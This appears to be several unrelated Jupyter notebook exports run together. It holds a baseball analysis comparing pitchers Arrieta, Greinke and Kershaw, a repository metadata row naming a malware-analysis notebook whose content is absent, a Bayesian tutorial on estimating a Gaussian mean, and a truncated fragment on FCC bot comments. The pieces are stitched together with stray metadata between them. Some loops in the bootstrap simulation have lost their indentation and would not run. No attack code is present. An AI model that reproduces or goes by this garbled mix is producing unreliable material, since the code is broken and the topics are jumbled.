col_titles = ['{}'.format(col_title.replace('rolling', '')) for col_title in stats]
fig, axes = plt.subplots(figsize=(16,6), nrows=len(PITCHERS), ncols=len(stats), sharex=True)
fig.tight_layout(pad=1.2, h_pad=1.5)
# label each column with stat name
for ax, col_title in zip(axes[0], col_titles):
    ax.set_title(col_title, size=15)
# label each row with player name
for ax, row_title in zip(axes[:,0], row_titles):
    ax.set_ylabel(row_title, rotation=0, size=15, labelpad=40)
for i, (name, pitcher) in enumerate(PITCHERS.items()):
    for j, stat in enumerate(stats):
        # NOTE(review): 'title' is assigned but never used in this loop.
        title = '{}: {}'.format(name, stat.replace('rolling', '')) # remove "rolling" from "rollingERA"
        pitcher['df'][stat].plot(ax=axes[i,j], color=pitcher['color'], linestyle=pitcher['style'])
        # for ease of comparison, let's plot the other pitchers on the same chart
        # but let's make them a light grey with the appropriate linestyle
        for k, v in PITCHERS.items():
            if k != name:
                v['df'][stat].plot(ax=axes[i,j], color='grey', alpha=0.4, linestyle=v['style'])
        axes[i,j].tick_params(axis='both', which='major', labelsize=13)
        axes[i,j].axvline(allstarbreak, color='k', linestyle=':', linewidth=1)
        axes[i,j].yaxis.set_major_locator(MaxNLocator(nbins=4))
    # shared y-limits per column so rows are directly comparable
    axes[i,0].set_ylim(0, 6) # ERA
    axes[i,1].set_ylim(0, 15.) # K/9
    axes[i,2].set_ylim(0, .350) # AVG
    axes[i,3].set_ylim(0, .4) # OBP
    axes[i,4].set_ylim(0, .5) # SLG
    axes[i,5].set_ylim(0, .9) # OPS
    # axes[i,j].spines['top'].set_visible(False)
    # axes[i,j].spines['right'].set_visible(False)
plt.savefig('images/stats-comparison.png', bbox_inches='tight', dpi=120)
# +
# Same small-multiples grid as above, but for batted-ball / rate stats.
stats = ['IP%', 'BABIP', 'XBH%', 'HR%', 'K%']
row_titles = ['{}'.format(row_title) for row_title in PITCHERS.keys()]
col_titles = ['{}'.format(col_title) for col_title in stats]
fig, axes = plt.subplots(figsize=(15,6), nrows=len(PITCHERS), ncols=len(stats), sharex=True)
fig.tight_layout(pad=1.2, h_pad=1.5)
# label each column with stat name
for ax, col_title in zip(axes[0], col_titles):
    ax.set_title(col_title, size=15)
# label each row with player name
for ax, row_title in zip(axes[:,0], row_titles):
    ax.set_ylabel(row_title, rotation=0, size=15, labelpad=40)
for i, (name, pitcher) in enumerate(PITCHERS.items()):
    for j, stat in enumerate(stats):
        # NOTE(review): 'title' is assigned but never used in this loop.
        title = '{}: {}'.format(name, stat) # remove "rolling" from "rollingERA"
        pitcher['df'][stat].plot(ax=axes[i,j], color=pitcher['color'], linestyle=pitcher['style'])
        # for ease of comparison, let's plot the other pitchers on the same chart
        # but let's make them a light grey with the appropriate linestyle
        for k, v in PITCHERS.items():
            if k != name:
                v['df'][stat].plot(ax=axes[i,j], color='grey', alpha=0.4, linestyle=v['style'])
        axes[i,j].tick_params(axis='both', which='major', labelsize=13)
        axes[i,j].axvline(allstarbreak, color='k', linestyle=':', linewidth=1)
        axes[i,j].yaxis.set_major_locator(MaxNLocator(nbins=4))
    # shared y-limits per column so rows are directly comparable
    axes[i,0].set_ylim(0, 1.) # IP%
    axes[i,1].set_ylim(0, .500) # BABIP
    axes[i,2].set_ylim(0, .16) # XBH%
    axes[i,3].set_ylim(0, .04) # HR%
    axes[i,4].set_ylim(0, .36) # K%
    # axes[i,j].spines['top'].set_visible(False)
    # axes[i,j].spines['right'].set_visible(False)
plt.savefig('images/rates-comparison.png', bbox_inches='tight', dpi=120)
# -
# ## Season Simulation
# ### What if we replayed the season (sampling randomly from their performances)? Can we tell who is truly the ERA winner?
# +
# use the bootstrap to pick a "season" with replacement.
# do this 1000 times. compare the distributions of important stats
np.random.seed(49)
arrietaSeasons = []
greinkeSeasons = []
kershawSeasons = []
for i in range(1000):
arrietaGameIds = np.random.choice(arrieta.index, size=len(arrieta.index), replace=True)
arrietaSeasons.append(arrieta.ix[arrietaGameIds]) # one DataFrame = one "season"
greinkeGameIds = np.random.choice(greinke.index, size=len(greinke.index), replace=True)
greinkeSeasons.append(greinke.ix[greinkeGameIds])
kershawGameIds = np.random.choice(kershaw.index, size=len(kershaw.index), replace=True)
kershawSeasons.append(kershaw.ix[kershawGameIds])
# there's a much, much better way to structure this code ... but I was thinking of more things as I was writing it
# so it just kept expanding. oh well. it's readable.
sims = {'arrieta': defaultdict(list),
'greinke': defaultdict(list),
'kershaw': defaultdict(list)}
for i in range(1000):
# ERA
sims['arrieta']['ERA'].append(arrietaSeasons[i].ER.sum() / (arrietaSeasons[i].IP.sum() / 9.))
sims['greinke']['ERA'].append(greinkeSeasons[i].ER.sum() / (greinkeSeasons[i].IP.sum() / 9.))
sims['kershaw']['ERA'].append(kershawSeasons[i].ER.sum() / (kershawSeasons[i].IP.sum() / 9.))
# strikeouts
sims['arrieta']['SO'].append(arrietaSeasons[i].SO.sum())
sims['greinke']['SO'].append(greinkeSeasons[i].SO.sum())
sims['kershaw']['SO'].append(kershawSeasons[i].SO.sum())
# hits
sims['arrieta']['H'].append(arrietaSeasons[i].H.sum())
sims['greinke']['H'].append(greinkeSeasons[i].H.sum())
sims['kershaw']['H'].append(kershawSeasons[i].H.sum())
# doubles
sims['arrieta']['2B'].append(arrietaSeasons[i]['2B'].sum())
sims['greinke']['2B'].append(greinkeSeasons[i]['2B'].sum())
sims['kershaw']['2B'].append(kershawSeasons[i]['2B'].sum())
# doubles
sims['arrieta']['3B'].append(arrietaSeasons[i]['3B'].sum())
sims['greinke']['3B'].append(greinkeSeasons[i]['3B'].sum())
sims['kershaw']['3B'].append(kershawSeasons[i]['3B'].sum())
# home runs
sims['arrieta']['HR'].append(arrietaSeasons[i].HR.sum())
sims['greinke']['HR'].append(greinkeSeasons[i].HR.sum())
sims['kershaw']['HR'].append(kershawSeasons[i].HR.sum())
# walks
sims['arrieta']['BB'].append(arrietaSeasons[i].BB.sum())
sims['greinke']['BB'].append(greinkeSeasons[i].BB.sum())
sims['kershaw']['BB'].append(kershawSeasons[i].BB.sum())
# HBP
sims['arrieta']['HBP'].append(arrietaSeasons[i].HBP.sum())
sims['greinke']['HBP'].append(greinkeSeasons[i].HBP.sum())
sims['kershaw']['HBP'].append(kershawSeasons[i].HBP.sum())
# sacrifice flies
sims['arrieta']['SF'].append(arrietaSeasons[i].SF.sum())
sims['greinke']['SF'].append(greinkeSeasons[i].SF.sum())
sims['kershaw']['SF'].append(kershawSeasons[i].SF.sum())
# opponent batting average
sims['arrieta']['AVG'].append(arrietaSeasons[i].H.sum() / arrietaSeasons[i].AB.sum())
sims['greinke']['AVG'].append(greinkeSeasons[i].H.sum() / greinkeSeasons[i].AB.sum())
sims['kershaw']['AVG'].append(kershawSeasons[i].H.sum() / kershawSeasons[i].AB.sum())
# opponent OBP
arrietaOBP = (arrietaSeasons[i].H.sum() + arrietaSeasons[i].BB.sum() + arrietaSeasons[i].HBP.sum()) \
/ (arrietaSeasons[i].AB.sum() + arrietaSeasons[i].BB.sum() + \
arrietaSeasons[i].HBP.sum() + arrietaSeasons[i].SF.sum())
greinkeOBP = (greinkeSeasons[i].H.sum() + greinkeSeasons[i].BB.sum() + greinkeSeasons[i].HBP.sum()) \
/ (greinkeSeasons[i].AB.sum() + greinkeSeasons[i].BB.sum() + \
greinkeSeasons[i].HBP.sum() + greinkeSeasons[i].SF.sum())
kershawOBP = (kershawSeasons[i].H.sum() + kershawSeasons[i].BB.sum() + kershawSeasons[i].HBP.sum()) \
/ (kershawSeasons[i].AB.sum() + kershawSeasons[i].BB.sum() + \
kershawSeasons[i].HBP.sum() + kershawSeasons[i].SF.sum())
sims['arrieta']['OBP'].append(arrietaOBP)
sims['greinke']['OBP'].append(greinkeOBP)
sims['kershaw']['OBP'].append(kershawOBP)
# opponent slugging percentage
arrietaSLG = (arrietaSeasons[i].H.sum() + \
(arrietaSeasons[i]['2B'].sum() * 2) + \
(arrietaSeasons[i]['3B'].sum() * 3) + \
(arrietaSeasons[i]['HR'].sum() * 4)) / arrietaSeasons[i]['AB'].sum()
greinkeSLG = (greinkeSeasons[i].H.sum() + \
(greinkeSeasons[i]['2B'].sum() * 2) + \
(greinkeSeasons[i]['3B'].sum() * 3) + \
(greinkeSeasons[i]['HR'].sum() * 4)) / greinkeSeasons[i]['AB'].sum()
kershawSLG = (kershawSeasons[i].H.sum() + \
(kershawSeasons[i]['2B'].sum() * 2) + \
(kershawSeasons[i]['3B'].sum() * 3) + \
(kershawSeasons[i]['HR'].sum() * 4)) / kershawSeasons[i]['AB'].sum()
sims['arrieta']['SLG'].append(arrietaSLG)
sims['greinke']['SLG'].append(greinkeSLG)
sims['kershaw']['SLG'].append(kershawSLG)
# at bats
sims['arrieta']['AB'].append(arrietaSeasons[i].AB.sum())
sims['greinke']['AB'].append(greinkeSeasons[i].AB.sum())
sims['kershaw']['AB'].append(kershawSeasons[i].AB.sum())
# batters faced
sims['arrieta']['BF'].append(arrietaSeasons[i].BF.sum())
sims['greinke']['BF'].append(greinkeSeasons[i].BF.sum())
sims['kershaw']['BF'].append(kershawSeasons[i].BF.sum())
# pitches
sims['arrieta']['Pit'].append(arrietaSeasons[i].Pit.sum())
sims['greinke']['Pit'].append(greinkeSeasons[i].Pit.sum())
sims['kershaw']['Pit'].append(kershawSeasons[i].Pit.sum())
# strikes
sims['arrieta']['Str'].append(arrietaSeasons[i].Str.sum())
sims['greinke']['Str'].append(greinkeSeasons[i].Str.sum())
sims['kershaw']['Str'].append(kershawSeasons[i].Str.sum())
# strikes - looking
sims['arrieta']['StL'].append(arrietaSeasons[i].StL.sum())
sims['greinke']['StL'].append(greinkeSeasons[i].StL.sum())
sims['kershaw']['StL'].append(kershawSeasons[i].StL.sum())
# strikes - swinging
sims['arrieta']['StS'].append(arrietaSeasons[i].StS.sum())
sims['greinke']['StS'].append(greinkeSeasons[i].StS.sum())
sims['kershaw']['StS'].append(kershawSeasons[i].StS.sum())
# -
# Overlay the three simulated ERA distributions on one set of axes.
plt.title('ERA')
for pitcher, label in [('arrieta', 'Arrieta'), ('greinke', 'Greinke'), ('kershaw', 'Kershaw')]:
    plt.hist(sims[pitcher]['ERA'], label=label, alpha=.4)
plt.xlabel('ERA')
plt.ylabel('# of simulations')
plt.legend(loc='best');
# +
# Helper functions for proper rounding of stats.
# PEP 8 (E731): use `def` rather than binding a lambda to a name, so each
# helper gets a real __name__ (for tracebacks) and a docstring.
def round_1(x):
    """Round *x* to 1 decimal place."""
    return round(x, 1)


def round_2(x):
    """Round *x* to 2 decimal places."""
    return round(x, 2)


def round_3(x):
    """Round *x* to 3 decimal places."""
    return round(x, 3)
# Round every simulated ERA to 2 decimals, then tally how many simulations
# landed on each rounded value (value -> count, as a pandas Series).
arrietaERA = [round_2(era) for era in sims['arrieta']['ERA']]
greinkeERA = [round_2(era) for era in sims['greinke']['ERA']]
kershawERA = [round_2(era) for era in sims['kershaw']['ERA']]
arrieta_cdf = pd.Series(dict(Counter(arrietaERA)))
greinke_cdf = pd.Series(dict(Counter(greinkeERA)))
kershaw_cdf = pd.Series(dict(Counter(kershawERA)))
# +
# BUG FIX: np.arange with a fractional step accumulates floating-point
# representation error (e.g. 2.3200000000000003 rather than 2.32), while the
# index values being aligned against are exact round(x, 2) results; with the
# raw arange grid, reindex() fails to match those labels and zero-fills real
# counts.  Rounding the grid to 2 decimals makes its floats identical to the
# ones round_2 produced.
idx = np.round(np.arange(0, 3.51, .01), 2)
# what percentage of the time do each combination wind up with the same ERA?
ERA = pd.concat([arrieta_cdf, greinke_cdf, kershaw_cdf], axis=1)
ERA.rename(columns={0: 'Arrieta', 1: 'Greinke', 2: 'Kershaw'}, inplace=True)
# Align every rounded ERA value onto the common grid; missing = 0 simulations.
ERA = ERA.reindex(index=idx).fillna(0.)
# min(axis=1) per row gives the overlap: the number of simulations in which
# both (or all three) pitchers produced that same rounded ERA value.
ERA['Arrieta-Greinke'] = ERA[['Arrieta', 'Greinke']].min(axis=1)
ERA['Arrieta-Kershaw'] = ERA[['Arrieta', 'Kershaw']].min(axis=1)
ERA['Greinke-Kershaw'] = ERA[['Greinke', 'Kershaw']].min(axis=1)
ERA['Arrieta-Greinke-Kershaw'] = ERA[['Arrieta', 'Greinke', 'Kershaw']].min(axis=1)
# -
ERA[['Arrieta-Greinke-Kershaw']].sum()
ERA[['Arrieta-Greinke-Kershaw']].plot(kind='area')
# +
# 3x5 grid of histograms: one row per pitcher (alphabetical), one column per
# stat.  Dotted vertical lines mark the bootstrap 95% interval (2.5th and
# 97.5th percentiles).
metrics = ['ERA', 'SO', 'AVG', 'OBP', 'SLG']
fig, axes = plt.subplots(figsize=(15,8), ncols=len(metrics), nrows=3, sharex='col', squeeze=False)
fig.tight_layout(pad=3.0, h_pad=5.0)
cmap = plt.get_cmap('Paired')
for col, metric in enumerate(metrics):
    shade = cmap(1. * col / len(metrics))
    for row, name in enumerate(sorted(sims.keys())):
        ax = axes[row, col]
        values = sims[name][metric]
        lo, hi = np.percentile(values, q=[2.5, 97.5])
        ax.hist(values, color=shade)
        ax.axvline(lo, linestyle=':', color='k')
        ax.axvline(hi, linestyle=':', color='k')
        ax.xaxis.set_major_locator(MaxNLocator(nbins=4))
        ax.set_title('{}: {}'.format(name.capitalize(), metric))
        for side in ('top', 'left', 'right'):
            ax.spines[side].set_visible(False)
# -
# # Pitch f/x
# Load each pitcher's per-pitch PITCHf/x export, parsing game dates up front.
def _load_pitches(name):
    # Builds the same 'data/pitchfx/<name>.csv' paths the notebook used inline.
    return pd.read_csv('data/pitchfx/{}.csv'.format(name), parse_dates=['game_date'])

arrietaPitches = _load_pitches('arrieta')
greinkePitches = _load_pitches('greinke')
kershawPitches = _load_pitches('kershaw')
# ## Add some columns to make things easier
# Peek at the raw outcome categories before deriving flags from them.
arrietaPitches.pitch_result.value_counts()
arrietaPitches.atbat_result.value_counts()
# +
# if it's not a ball, it's a strike
ball_vals = ['Ball', 'Ball In Dirt', 'Intent Ball', 'Hit By Pitch']
swing_and_miss = ['Swinging Strike', 'Swinging Strike (Blocked)', 'Missed Bunt']
hit_vals = ['Single', 'Double', 'Triple', 'Home Run']
# is_strike: first .loc marks balls as 0 (creating the column, NaN elsewhere);
# the second .loc then flags every remaining row -- NaN != 0 is True -- as 1.
arrietaPitches.loc[arrietaPitches.pitch_result.isin(ball_vals), 'is_strike'] = 0
arrietaPitches.loc[arrietaPitches.is_strike != 0, 'is_strike'] = 1
# Swing-and-miss / hit / total-bases flags (rows not matched stay NaN).
arrietaPitches.loc[arrietaPitches.pitch_result.isin(swing_and_miss), 'swing_and_miss'] = 1
arrietaPitches.loc[arrietaPitches.atbat_result.isin(hit_vals), 'is_hit'] = 1
arrietaPitches.loc[arrietaPitches.atbat_result == 'Single', 'total_bases'] = 1
arrietaPitches.loc[arrietaPitches.atbat_result == 'Double', 'total_bases'] = 2
arrietaPitches.loc[arrietaPitches.atbat_result == 'Triple', 'total_bases'] = 3
arrietaPitches.loc[arrietaPitches.atbat_result == 'Home Run', 'total_bases'] = 4
# NOTE(review): Greinke and Kershaw only get is_strike here -- they are
# missing the swing_and_miss / is_hit / total_bases columns Arrieta gets
# above.  Confirm whether that asymmetry is intentional.
greinkePitches.loc[greinkePitches.pitch_result.isin(ball_vals), 'is_strike'] = 0
greinkePitches.loc[greinkePitches.is_strike != 0, 'is_strike'] = 1
kershawPitches.loc[kershawPitches.pitch_result.isin(ball_vals), 'is_strike'] = 0
kershawPitches.loc[kershawPitches.is_strike != 0, 'is_strike'] = 1
# -
# ### Who gets hit harder - Arrieta vs. Greinke vs. Kershaw
# +
# Side-by-side batted-ball velocity histograms with shared axes so the three
# pitchers' distributions are directly comparable.
fig, axes = plt.subplots(ncols=3, sharex=True, sharey=True, figsize=(14,5))
panels = [
    (arrietaPitches, 'Arrieta', ja),
    (greinkePitches, 'Greinke', zg),
    (kershawPitches, 'Kershaw', 'grey'),
]
for ax, (frame, who, shade) in zip(axes, panels):
    frame.batted_ball_velocity.hist(ax=ax, bins=20, label=who, alpha=.5, color=shade)
    ax.set_title('{} BB Velocity'.format(who));
# +
# Grid of batted-ball velocity histograms: one row per pitcher, one column
# per batted-ball type (GB/LD/FB/PU).  Red dashed line marks the mean.
# NOTE: row labels come from pitchers.keys() while the plotting loop below
# iterates pitchers.items(); both walk the same dict, so the order agrees.
bbtypes = ['GB', 'LD', 'FB', 'PU']
pitchers = {'Arrieta': arrietaPitches, 'Greinke': greinkePitches, 'Kershaw': kershawPitches}
row_titles = ['{}'.format(row_title) for row_title in pitchers.keys()]
col_titles = ['{}'.format(col_title) for col_title in bbtypes]
fig, axes = plt.subplots(figsize=(15,6), nrows=len(pitchers), ncols=len(bbtypes), sharex=True, sharey=True)
fig.tight_layout(pad=1.2, h_pad=1.5)
# label each column with the batted-ball type
for ax, col_title in zip(axes[0], col_titles):
    ax.set_title(col_title, size=15)
# label each row with the pitcher's name
for ax, row_title in zip(axes[:,0], row_titles):
    ax.set_ylabel(row_title, rotation=0, size=15, labelpad=40)
for i, (name, df) in enumerate(pitchers.items()):
    for j, bb in enumerate(bbtypes):
        title = '{}: {}'.format(name, bb)  # NOTE(review): computed but unused
        vals = df[df.batted_ball_type == bb]['batted_ball_velocity']
        vals.hist(ax=axes[i,j], alpha=.5)
        axes[i,j].axvline(np.mean(vals), color='r', linestyle='--', linewidth=1)
        axes[i,j].tick_params(axis='both', which='major', labelsize=13)
        axes[i,j].xaxis.set_major_locator(MaxNLocator(nbins=4))
#         axes[i,j].spines['top'].set_visible(False)
#         axes[i,j].spines['left'].set_visible(False)
#         axes[i,j].spines['right'].set_visible(False)
# -
# ### Is it significant?
# +
# Bootstrap the mean batted-ball velocity per pitcher: resample each
# pitcher's batted balls with replacement 1000 times and keep the means.
# The fixed seed pins the exact resampling sequence, so the draw order
# (arrieta, greinke, kershaw within each iteration) must not change.
np.random.seed(49)
arrietaBBs = arrietaPitches[arrietaPitches.batted_ball_velocity > 0].batted_ball_velocity
greinkeBBs = greinkePitches[greinkePitches.batted_ball_velocity > 0].batted_ball_velocity
kershawBBs = kershawPitches[kershawPitches.batted_ball_velocity > 0].batted_ball_velocity
arrietaSamples, greinkeSamples, kershawSamples = [], [], []
for _ in range(1000):
    for pool, dest in ((arrietaBBs, arrietaSamples),
                       (greinkeBBs, greinkeSamples),
                       (kershawBBs, kershawSamples)):
        dest.append(np.random.choice(pool, size=len(pool), replace=True))
arrietaMeans = [np.mean(draw) for draw in arrietaSamples]
greinkeMeans = [np.mean(draw) for draw in greinkeSamples]
kershawMeans = [np.mean(draw) for draw in kershawSamples]
# Plot the three bootstrap distributions of the mean with minimal chrome.
fig, ax = plt.subplots(figsize=(10, 4))
plt.hist(arrietaMeans, alpha=.5, label='Arrieta', color=ja)
plt.hist(greinkeMeans, alpha=.6, label='Greinke', color=zg)
plt.hist(kershawMeans, alpha=.3, label='Kershaw', color=kc)
plt.legend(loc='best')
plt.xlabel('Avg. Batted Ball Velocity', fontsize=15)
for side in ('right', 'left', 'top'):
    ax.spines[side].set_visible(False)
ax.xaxis.set_ticks_position('bottom')
plt.tick_params(axis='both', which='major', labelsize=13)
ax.get_yaxis().set_ticks([])
plt.savefig('images/avg-batted-ball-velocity.png', bbox_inches='tight', dpi=120);
# -
# Point estimate of the difference in bootstrap means (Greinke minus Arrieta).
np.mean(greinkeMeans) - np.mean(arrietaMeans)
# Statistically, we can say that Greinke gets hit harder than both Arrieta and Kershaw, though we cannot say there's a difference between Arrieta and Kershaw.
greinkePitches.head(3)
# ### What is the relationship between batted ball velocity and batting average against these three?
# Keep only pitches that were actually put in play (a velocity was recorded).
arrietaHit = arrietaPitches[arrietaPitches.batted_ball_velocity.notnull()]
greinkeHit = greinkePitches[greinkePitches.batted_ball_velocity.notnull()]
kershawHit = kershawPitches[kershawPitches.batted_ball_velocity.notnull()]
print('# of pitches batted')
print('====================')
print('Arrieta: %s' % len(arrietaHit))
print('Greinke: %s' % len(greinkeHit))
print('Kershaw: %s' % len(kershawHit))
# ## How difficult is each of their particular pitches to hit?
# Raw pitch-type mix (count per pitch type) for each pitcher.
print('Arrieta\n', arrietaPitches.pitch_type.value_counts())
print('Greinke\n', greinkePitches.pitch_type.value_counts())
print('Kershaw\n', kershawPitches.pitch_type.value_counts())
# ## Historical Cy Young Results
# +
def era_ranker(df):
    """Rank pitchers within a voting group by ERA (1 = lowest/best).

    Returns the group sorted ascending by ``earned_run_avg`` with a 1-based
    ``ERA_rank`` column appended.  Intended for ``groupby(...).apply``.
    Works on a sorted copy instead of mutating the argument in place
    (``inplace=True`` inside groupby.apply triggers SettingWithCopyWarning
    and mutates the caller's group); the returned frame is what apply uses,
    so results are unchanged.  Note: ties keep their incoming order
    (positional rank, not a tie-aware rank).
    """
    df = df.sort_values('earned_run_avg')
    df['ERA_rank'] = np.arange(len(df)) + 1
    return df


def wins_ranker(df):
    """Rank pitchers within a voting group by wins (1 = most wins).

    Returns the group sorted descending by ``W`` with a 1-based
    ``wins_rank`` column appended.  Intended for ``groupby(...).apply``;
    see ``era_ranker`` for why the sort is not done in place.
    """
    df = df.sort_values('W', ascending=False)
    df['wins_rank'] = np.arange(len(df)) + 1
    return df
# -
# Load historical Cy Young voting results; 'share' arrives like '98%' and is
# converted to a 0-1 fraction.
cy = pd.read_csv('data/cyyoung/results.csv')
cy['share'] = cy.share.str.replace('%', '').apply(int) / 100
winners = cy[cy['rank'] == 1]
# Within each (year, league) ballot, attach positional ERA and wins ranks.
cy = cy.groupby(['year', 'league']).apply(era_ranker).sort_values(['year', 'league'], ascending=False)
cy = cy.groupby(['year', 'league']).apply(wins_ranker).sort_values(['year', 'league'], ascending=False)
ranks = cy[['rank', 'player', 'W', 'earned_run_avg', 'earned_run_avg_plus', 'SV', 'wins_rank', 'ERA_rank']].reset_index()
# NOTE(review): level_2..level_4 are artifacts of the nested groupby/apply
# index; this drop assumes that exact index shape -- verify if pandas is upgraded.
ranks.drop(['level_2', 'level_3', 'level_4'], axis=1, inplace=True)
ranks.set_index(['year', 'league', 'player'], inplace=True)
# Binary flag: did this player win the award that year in that league?
ranks.loc[ranks['rank'] == 1, 'winner'] = 1
ranks.loc[ranks['rank'] != 1, 'winner'] = 0
ranks.reset_index(inplace=True)
# Count winners by (wins_rank, ERA_rank) cell: how often the award went to the
# pitcher ranked #1 in wins, #1 in ERA, and so on.
g = ranks.groupby(['year', 'league', 'wins_rank', 'ERA_rank'])['winner'].sum().unstack([1, 0]).fillna(0)
rankings = g.sum(axis=1).unstack(1).fillna(0)
g.sum(axis=1).unstack(1).fillna(0).sum(axis=1)
rankings
# ### Closest Cy Young Races
cy.columns
# Vote share by finishing rank, split by league; used to find the closest races.
diff = cy.groupby(['year', 'rank', 'league'])['share'].sum().unstack([2,1]).fillna(0)
# BUG FIX: Series.order() was deprecated in pandas 0.17 and removed in 0.20;
# sort_values() is the supported equivalent (ascending by default, like order()).
(diff['AL'][1] - diff['AL'][2]).sort_values()
| 30,910 |
/notebooks/Malware PowerShell shellcode analysis.ipynb
|
4085c7b145eb7b572593be06331497009949360f
|
[
"MIT"
] |
permissive
|
CyberMonitor/Shared
|
https://github.com/CyberMonitor/Shared
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 547,708 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# <h2>Bayesian Inference of the mean of a Gaussian</h2>
# <p>In this notebook, we will use Bayesian inference to infer the mean of a Gaussian. We assume that we observe $N$ values that have come from a Gaussian with mean $\mu$ and variancs $\sigma^2$. Assuming that we know $\sigma^2=1$, we would like to determine $\mu$.</p>
#
# <p>We start by defining a prior density on $\mu$. We will use a Gaussian as our likelihood will be Gaussian (as per our assumption above) and the Gaussian prior is conjugate to the Gaussian likelihood. We (arbitrarily - in real problems you should think carefully about prior values) choose a prior with mean $a=0$ and variance $b^2=1$</p>
import numpy as np

# Model constants:
#   true_mu -- mean of the generating Gaussian (what inference should recover)
#   a, b_sq -- prior mean and prior variance on mu
#   sig_sq  -- known likelihood (observation) variance, assumed fixed
true_mu = 2.0
a = 0
b_sq = 1
sig_sq = 1
# Draw N=10 observations x_i ~ N(true_mu, sig_sq), shaped as a (10, 1) column.
x = np.random.normal(true_mu,np.sqrt(sig_sq),(10,1))
# <p>The plot below shows our choice of prior density:</p>
# +
import pylab as plt
# %matplotlib inline
def normal_pdf(x, mu, sigma):
    """Gaussian density N(x | mu, sigma^2); evaluates elementwise on arrays."""
    norm_const = 1.0 / (sigma * np.sqrt(2 * np.pi))
    quad = -(1.0 / (2.0 * sigma ** 2)) * (x - mu) ** 2
    return norm_const * np.exp(quad)
plotx = np.arange(-5,5,0.01)
plt.plot(plotx,normal_pdf(plotx,a,np.sqrt(b_sq)),'r')
plt.title('Prior density')
# -
# <p>Because we chose a conjugate prior-likelihood pair, we are able to compute the posterior analytically. From Bayes rule, we have:
# $$ p(\mu|x_1,\ldots,x_N,a,b^2,\sigma^2) = \frac{p(x_1,\ldots,x_N|\mu,\sigma^2)p(\mu|a,b^2)}{p(x_1,\ldots,x_N|\sigma^2,a,b^2)}$$
# The likelihood term can be factorised as:
# $$
# p(x_1,\ldots,x_N|\mu,\sigma^2) = \prod_{i=1}^N p(x_i|\mu,\sigma^2) = \prod_{i=1}^N {\cal N}(x_i|\mu,\sigma^2)
# $$
# Because the prior and likelihood are conjugate (both are Gaussian), we know that the posterior must be Gaussian. Given this, and the fact that the term in the denominator (the marginal likelihood) doesn't include $\mu$ and can be ignored, we're left with matching the $\mu$ terms in the posterior with those in the product of the likelihood and the prior. Ignoring the constant, the posterior can be written as:
# $$
# p(\mu|x_1,\ldots,x_N,a,b^2,\sigma^2) = {\cal N}(\mu|c,d^2) \propto \exp\left(-\frac{1}{2d^2}(\mu-c)^2\right)
# $$
# The product of the prior and the likelihood is proportional to:
# $$
# \exp\left(-\frac{1}{2b^2}(\mu-a)^2 - \frac{1}{2\sigma^2}\sum_{i=1}^N (x_i-\mu)^2 \right)
# $$
# To work out $c$ and $d^2$, we can match the $\mu$ and $\mu^2$ terms in the two expressions. Starting with $\mu^2$ we have:
# $$
# \mbox{Posterior}: -\frac{1}{2d^2},~~~~\mbox{Prior times likelihood}: -\frac{1}{2b^2} - \frac{N}{2\sigma^2}
# $$
# Therefore:
# $$
# -\frac{1}{2d^2} = -\frac{1}{2b^2} - \frac{N}{2\sigma^2}
# $$
# and
# $$
# d^2 = \left(\frac{1}{b^2} + \frac{N}{\sigma^2}\right)^{-1}
# $$
# To find $c$ we equate the $\mu$ terms:
# $$
# \mbox{Posterior}: \frac{c}{d^2},~~~~\mbox{Prior times likelihood}: \frac{a}{b^2} + \frac{\sum_{i=1}^N x_i}{\sigma^2}
# $$
# Therefore:
# $$
# \frac{c}{d^2} = \frac{a}{b^2} + \frac{\sum_{i=1}^N x_i}{\sigma^2}
# $$
# and
# $$
# c = d^2\left(\frac{a}{b^2} + \frac{\sum_{i=1}^N x_i}{\sigma^2}\right)
# $$
# <p>We now add the data one at a time, and see how the posterior density changes. In the plots, the red curve is the prior, the blue curve the posterior and the black circles the data. Remember that the posterior is over the mean value, so it may well not cover all of the data.</p>
# Sequential Bayesian updating: after observing the first n points the
# posterior over mu is N(c, d_sq) with
#   d_sq = (1/b^2 + n/sigma^2)^-1
#   c    = d_sq * (a/b^2 + sum(x_1..x_n)/sigma^2)
# Each iteration plots prior (red), posterior (blue) and the data seen so
# far (black dots) in a fresh figure.
all_c = []
all_d_sq = []
for n in range(1, x.size + 1):
    seen = x[:n]
    d_sq = 1.0 / (1.0 / b_sq + (n * 1.0) / sig_sq)
    c = d_sq * (a / b_sq + seen.sum() / sig_sq)
    all_c.append(c)
    all_d_sq.append(d_sq)
    plt.figure()
    plt.plot(plotx, normal_pdf(plotx, a, np.sqrt(b_sq)), 'r')
    plt.plot(plotx, normal_pdf(plotx, c, np.sqrt(d_sq)), 'b')
    plt.plot(seen, np.zeros_like(seen), 'ko', markersize=10)
# <p>We can also plot the evolution of the posterior mean ($c$) and variance ($d^2$).</p>
# Posterior mean c versus number of observations; dashed line marks true_mu.
plt.plot(np.arange(x.size)+1,all_c,'k')
plt.plot([1,x.size+1],[true_mu,true_mu],'k--')
plt.xlabel('N')
plt.ylabel('c')
# Posterior variance d^2 shrinks toward zero as more data arrive.
plt.plot(np.arange(x.size)+1,all_d_sq,'r')
plt.xlabel('N')
plt.ylabel('$d^2$')
ore thoroughly through the text.
#
# These are some of the different definitions that have been set up to highlight bots.
# Broadband for America
# Background: Emprata published a paper on the submitted comments to the FCC (Federal Communications Commission), analysing whether the comment sentiment was in favor/against the repeal of Title II. By setting up different parameters under which to analyse, it was found that more than 80% of comments were made by bots. Note, that this isn’t directed at highlighting bots on twitter, but on the website of the FCC.
#
# This is a review of the parameters they set up to distinguish bots from real users. It doesn’t eliminate bots from the dataset, but gives a possible measurement of how many of the comments made by bots. Instead they analysed the comments into different groupings of aforementioned parameters.
#
# #### Entire Dataset
# ALL - First they looked at all the comments made.
# Consider only domestic comments - Then they narrowed it down, only looking at domestic comments
# Consider only international comments - Only looking at international comments
# EXCLUDE FAKEMAILGENERATOR - excluding comments made by temporary e-mail address services. (einrot.com, jourrapide.com, armyspy.com, fleckens.hu, cuvox.de, rhyta.com, gustr.com, superrito.com, teleworm.com)
#
# Unique comments
# UNIQUE COMMENTS – Number of unique comments in the docket
# TRULY UNIQUE COMMENTS – Number of comments appearing only once in the docket
#
# #### Eliminating Duplicative Comments
# • ONE PER ADDRESS – Considers only the first comment for each unique address, city, state, ZIP code combination
# • ONE PER EMAIL – Considers only the first comment from each email address
